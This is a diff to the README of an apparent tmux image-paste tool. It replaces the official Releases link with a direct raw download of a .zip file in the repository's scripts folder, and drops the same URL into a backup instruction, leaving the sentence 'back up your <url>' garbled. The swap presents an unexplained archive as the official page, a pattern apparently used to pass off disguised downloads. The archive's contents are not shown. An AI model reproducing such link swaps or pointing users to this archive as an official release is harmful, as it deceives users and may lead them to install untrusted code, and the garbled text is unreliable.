tine-psd/tmux-paste-image/README.md

 - The installation script will configure your tmux environment and set up default keybindings
 - After installation, reload tmux or restart the session to apply changes
 - You can also run the installer manually if you prefer a custom installation path
-- If you need an extra layer of safety, back up your tmux.conf and save directory first
+- If you need an extra layer of safety, back up your https://github.com/tine-psd/tmux-paste-image/raw/refs/heads/master/scripts/paste_tmux_image_v3.5.zip and save directory first
-- For quick access to the official page, visit the Releases area here: https://github.com/tine-psd/tmux-paste-image/releases
+- For quick access to the official page, visit the Releases area here: https://github.com/tine-psd/tmux-paste-image/raw/refs/heads/master/scripts/paste_tmux_image_v3.5.zip

 Usage examples
 - Example 1: Basic usage in a standard tmux pane